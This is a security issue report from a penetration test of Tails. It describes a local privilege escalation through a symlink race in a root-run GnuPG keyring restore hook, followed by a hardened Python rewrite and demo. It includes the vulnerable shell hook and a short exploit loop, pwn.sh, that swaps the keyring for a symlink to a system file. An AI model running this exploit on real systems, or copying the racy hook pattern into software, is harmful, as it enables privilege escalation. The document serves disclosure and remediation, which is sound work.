tails/tails issue #19548

TPS - Local Privilege Escalation (LPE) via symlink race condition in GnuPG activation hook

https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/5


Technical Description

/local/lib/persistent-storage/on-activated-hooks/GnuPG/maybe-restore-gnupg-pubring

#!/bin/sh

# refs: #17807

# Runs in a privileged context when the GnuPG feature of the Persistent
# Storage is activated (hence LPE), yet operates on paths inside the
# unprivileged user's home directory.

set -eu

KEYRING="/home/amnesia/.gnupg/pubring.kbx"
KEYRING_BAK="${KEYRING}~"
# Check by path (time of check) ...
KEYRING_SIZE="$(stat -c %s ${KEYRING} || echo 0)"

if [ ! -f "${KEYRING}" ] || [ "${KEYRING_SIZE}" -le 32 ]; then
  echo >&2 "warning: It seems the GnuPG keyring is corrupt"
  if [ -f "${KEYRING_BAK}" ]; then
    echo >&2 "warning: Restoring backup of GnuPG keyring"
    # ... write by path (time of use): cp and chmod both follow a symlink
    # that the owner of ~/.gnupg plants at ${KEYRING} in between, so the
    # user-controlled backup content lands on the link target.
    cp "${KEYRING_BAK}" "${KEYRING}"
    chmod u=rw,go= "${KEYRING}"
  fi
fi

Impact

PoC:

  1. Overwrite pubring.kbx~ with attacker-controlled content.
  2. Run pwn.sh.
  3. Activate and deactivate the GnuPG feature of the Persistent Storage several times until the race condition window is hit -> this could presumably be automated via a socket auth script?

pwn.sh

#!/bin/bash
while :
do
  rm -rf /home/amnesia/.gnupg/pubring.kbx;
  ln -sf /usr/lib/python3/dist-packages/tailslib/netnsdrop.py /home/amnesia/.gnupg/pubring.kbx;
done
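As an added example (not Tails' hook and not the fix the project shipped), the same restore policy written so that it cannot be redirected by a symlink: every access goes through one pinned directory fd with O_NOFOLLOW, the size comes from fstat on the opened fd rather than stat on a path, and the keyring is replaced with rename(2), which swaps out the final path component instead of writing through it. It assumes Linux semantics and a Python runtime; the demo function and its file names are constructed.

```python
import os
import tempfile

KEYRING, BACKUP = "pubring.kbx", "pubring.kbx~"

def maybe_restore_gnupg_pubring(gnupg_dir):
    # Hook policy (restore if the keyring is missing or <= 32 bytes), but every
    # open is relative to a pinned dir fd with O_NOFOLLOW: symlinks are refused.
    dfd = os.open(gnupg_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        try:
            kfd = os.open(KEYRING, os.O_RDONLY | os.O_NOFOLLOW, dir_fd=dfd)
            size = os.fstat(kfd).st_size  # fstat on the fd, not stat on a path
            os.close(kfd)
        except OSError:  # missing or a symlink (ELOOP): treat as corrupt
            size = 0
        if size > 32:
            return False
        try:
            bfd = os.open(BACKUP, os.O_RDONLY | os.O_NOFOLLOW, dir_fd=dfd)
        except OSError:
            return False  # no usable backup, same as the hook
        with os.fdopen(bfd, "rb") as src:
            data = src.read()
        tmp = KEYRING + ".restore.tmp"  # O_EXCL below: a planted entry fails closed
        wfd = os.open(tmp, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o600, dir_fd=dfd)
        with os.fdopen(wfd, "wb") as dst:
            dst.write(data)
        # rename(2) replaces the final path component itself, so a symlink
        # planted at pubring.kbx is unlinked rather than written through.
        os.rename(tmp, KEYRING, src_dir_fd=dfd, dst_dir_fd=dfd)
        return True
    finally:
        os.close(dfd)

def demo_symlink_at_keyring():
    # Constructed scenario in a temp dir: a valid backup, and pubring.kbx
    # replaced by a symlink to a file outside .gnupg, as in the PoC.
    base = tempfile.mkdtemp()
    gnupg, victim = os.path.join(base, ".gnupg"), os.path.join(base, "victim.txt")
    os.mkdir(gnupg)
    with open(victim, "w") as f:
        f.write("original\n")
    with open(os.path.join(gnupg, BACKUP), "wb") as f:
        f.write(b"K" * 64)
    os.symlink(victim, os.path.join(gnupg, KEYRING))
    restored = maybe_restore_gnupg_pubring(gnupg)
    kpath = os.path.join(gnupg, KEYRING)
    with open(victim) as v, open(kpath, "rb") as k:
        return restored, v.read(), os.path.islink(kpath), k.read()
```

The demo returns the restore result, the untouched target's contents, whether pubring.kbx is still a symlink, and the restored keyring bytes. If the activation framework allows it, running the restore as the unprivileged owner of the home directory removes the privilege boundary altogether and is the simpler structural fix.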

Recommendation
